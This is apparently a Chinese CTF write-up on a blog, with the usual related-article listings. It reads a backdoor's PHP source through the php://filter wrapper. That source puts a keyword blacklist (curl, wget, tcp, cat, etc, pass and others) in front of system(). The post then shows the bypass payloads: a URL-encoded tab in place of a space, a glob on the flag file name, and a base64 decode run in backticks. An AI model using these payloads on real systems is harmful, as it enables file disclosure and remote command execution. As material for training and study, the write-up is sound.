【代码审计】伪协议读取源码+正则绕过命令执行

最新推荐文章于 2023-05-09 16:29:25 发布
最新推荐文章于 2023-05-09 16:29:25 发布
阅读量697 收藏 3
点赞数
分类专栏: CTF_代码审计 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120879643
版权

1.首先打开页面查看源代码:

这里是一个简单的文件包含,使用伪协议进行读取:

?file=php://filter/convert.base64-encode/resource=mybackdoor.php

 2.进行解码后读取到mybackdoor.php的源码,本题比较简单,主要学习两种正则绕过方式:

<?php
error_reporting(0);
function blacklist($cmd){
  $filter = "(\\<|\\>|Fl4g|php|curl| |0x|\\\\|python|gcc|less|root|etc|pass|http|ftp|cd|tcp|udp|cat|×|flag|ph|hp|wget|type|ty|\\$\\{IFS\\}|index|\\*)";
  if (preg_match("/".$filter."/is",$cmd)==1){  
      exit('Go out! This black page does not belong to you!');
  }
  else{
    system($cmd);
  }
}
blacklist($_GET['cmd']);
?>

是简单的正则绕过:这里由于过滤了空格所以使用url编码tab键为%09:

ls%09/ 查看根目录

接下来读取文件:

方法一:使用nl命令:

nl%09/F[a-z]4g_is_here

nl命令在linux系统中用来计算文件中行号。

nl 可以将输出的文件内容自动的加上行号!其默认的结果与 cat -n 有点不太一样, nl 可以将行号做比较多的显示设计,包括位数与是否自动补齐 0 等等的功能。

方法二:使用base64编码读取

tac%09`echo%09L0ZsNGdfaXNfaGVyZQ|base64%09-d` 使用反引号表示将执行结果传递给tac

base64编码url的格式:

tac    `echo    /Fl4g_is_here|base64    -d`

malloc_冲!
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-WEB-RCE
m0_74317362的博客
07-24 216
会直接输出结果。
PHP之Base64+php://filter绕过、disabled_function绕过
求大佬师傅带
08-16 809
PHP之Base64+php://filter绕过、disabled_function绕过
php代码审计命令执行漏洞
h3110n3w0r1d
04-05 800
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别。 常用命令执行函数 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引号` 实际上是使用shell_exec()函数 system() 输出并返回最后一行shell结果。 exec()...
2021 CNSS招新赛 WEB WP
Sapphire037的博客
11-04 1266
Web Signin 一开始提示Please Change Your Method!,抓包修改为POST方法即可得到码 <?php error_reporting(0); require_once("flag.php"); if($_SERVER['REQUEST_METHOD'] !=='POST'){ die("Please Change Your Method!"); exit(); }else{ if(!isset($_POST["CNSS"])){
PHP实现IP黑白名单过滤
James Ren的专栏
09-13 813
需求来自一个运维的同事,对一个php文件执行进行IP过滤,不方便直接配置服务器,于是需要直接在php文件开头进行IP的过滤。 IP过滤规则,可以有如下形式: 1.完整的IP地址 如:192.168.0.1 2.某一段IP 如:192.168.0.* 。 运维可以自定义IP黑白名单,由多个IP过滤规则组成,保存在数组中。通过编写代码,实现IP黑白名...
excel VBA编程番外篇(字典+则表达式+FSO)
06-08
2.Microsoft Excel VBA与则表达式技术的结合应用,将使VBA的数据处理功能更加强大 3.在Scripting 类型库 (Scrrun.Dll)中,在VBA中对FSO对象下的驱动器、文件夹、文件的读取,写入、新建、复制、移动、删除等操作...
LabVIEW以字符串逆序+则形式快速读取文本最后一行.zip
08-13
在这个特定的案例中,我们关注的是如何使用LabVIEW通过字符串逆序和则表达式来快速读取文本文件的最后一行。这个程序的实现方式既巧妙又高效,尤其适用于处理大文件时,避免了逐行读取整个文件的低效。 首先,...
dlt645-2007电能表协议解析码+串口编程
05-15
协议支持的功能包括读取电能表数据、设置参数、执行控制操作等。 2. 协议解析码: 码中可能包含了解析协议帧的函数,例如解析地址域、命令域和数据域的方法。这些方法通常会涉及二进制数据的处理,如位移、位...
nodejs+字符串的模式匹配+则表达式+判断获取字符串的某些需求
04-03
则表达式(英语:Regular Expression,在代码中常简写为regex、regexp或RE)使用单个字符串来描述、匹配一系列符合某个句法规则的字符串搜索模式。搜索模式可用于文本搜索和文本替换。 语法 /则表达式主体/修饰...
基于python的代码审计工具+代码+文档说明
最新发布
12-01
### recode代码审计工具 > 方便在Mac/Linux下使用的一个代码审计工具 > 匹配规则部分来自于seay代码审计工具 > 准备做支持多语言的审计 > 开发版本为python 3.9 > 此版本为demo ### 使用方法: `python3 recode.py ...
ctf刷题小结
quan9i的博客
05-15 6240
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
BUUCTF web3
qq_61768489的博客
05-16 972
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
文件包含漏洞及绕过方法(以php为例)
热门推荐
HMX404的博客
09-27 1万+
一,文件包含漏洞的由来 简单的来说,为了减少“重复造轮子”引入了文件包含函数,可以直接使用文件中的文件和代码。当通过动态获文件时,或者需要引用网络上其他文件时,用户通过对变量值的修改访问规定的文件,但是未对变量值进行校验,导致有了可乘之机,一般在php中常见。 <?php $file = $_GET('file'); include($file); #除此之外还有Include_once;require;require_once;highlight_file; #show_source;readfil
巧用PHP数组函数
weixin_33912445的博客
03-05 72
2014年3月5日 08:48:39 情景:项目中需要根据传递来的参数的不同,使用不同的缓存 假如传递来的参数最多有这几个(在这个范围内,但是每次传过来的参数不确定): $arg = array( 'a' =&gt; '1111', 'b' =&gt; '2222', 'c' =&gt; '3333', 'd' =&gt; '4444', ...
用php自带的filter函数验证、过滤数据
shooke笔记
06-05 1726
PHP过滤器包含两种类型 Validation:用来验证验证项是否合法 Sanitization:用来格式化被验证的项目,因此它可能会修改验证项的值,将不合法的字符删除等。 input_filters_list()用来列出当前系统所支持的所有过滤器。<?php foreach(filter_list() as $id => $filter) { echo $filter.' '
浅谈php filter协议及一些绕过姿势
2301_77004573的博客
05-09 1545
(3).iconv.<input-encoding>.<output-encoding>或<input-encoding>/<output-encoding>:将输入的字符串编码转换成输出指定的编码。补充姿势:可以利用管道符进行多次编码如:php://filter/read=convert.base64-encode|convert.base64-encode/resource=文件名。例如最基础的:php://filter=convert.base64-encode/resource=文件名。
文件包含漏洞总结都在这里了
yuanxu8877的博客
10-20 3050
文件包含漏洞总结,全在这里了
文件包含漏洞&协议
qq_62078839的博客
04-16 2285
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
PHP协议详解
m0_67391521的博客
06-10 286
php支持的协议 1 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。简单通俗的说,这是一个中间件,在读入或写入数据的时候对数据进行处理后输出的一个过程。php://filter可以获取指定文件码。当它与包含函数结合时,php://filter流会被当作ph
读取页面代码协议使用方法
05-29
读取页面代码协议指的是在浏览器地址栏中输入"data:text/html,"后面跟着代码的字符串,使浏览器直接显示该字符串所表示的HTML代码。其使用方法如下: 1. 打开浏览器,在地址栏中输入"data:text/html,"...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值